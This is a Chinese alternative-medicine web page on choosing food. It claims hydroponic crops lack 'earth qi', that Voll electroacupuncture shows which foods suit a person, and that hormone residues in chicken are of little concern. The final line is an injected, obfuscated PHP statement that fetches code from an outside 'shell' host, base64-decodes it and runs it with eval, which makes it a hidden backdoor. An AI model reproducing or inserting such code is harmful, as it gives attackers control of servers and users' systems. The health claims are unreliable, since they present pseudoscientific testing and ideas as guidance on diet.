收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 選擇好食物的思考方式
選擇好食物的思考方式 列印 E-mail
        受限於耕地面積,我們在市場會看到一種以人工提供營養素所種植的「水耕農作」,這種水耕農作所被給予的營養素通常不夠完整。大自然的土地裡有太多我們無法想像的東西,例如「地氣」!

雖然對某些科學家來說,他們並不相信地氣這種虛無的存在,可是對練氣功的人來說,雙腳能踩到土地非常重要;相對地,人能吃到經由土地種植出來的食物也是很重要的,可是水耕就沒辦法做到這一點。

        再者,我不反對葷食,也不反對因為宗教信仰去選取食物的種類,因為人類腸道的長度本應為雜食性;我只希望做到,即便是葷食,仍要選擇不過敏的食物來食用。在某些另類醫學領域中,認為豬肉代謝出來的物質是最毒的,但我們拿豬肉以傅爾電針檢測,一樣有人適合、有人不適合。

有人說雞肉打荷爾蒙不要吃,事實上只要經過的時間夠長,雞隻自然會代謝掉這些生長激素,食用後對身體的影響相對較小。我的看法是不要把這些添加物的問題看得太過嚴重,而是要在意它是否使用過量,或沒有經過足夠時間將它給代謝掉。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));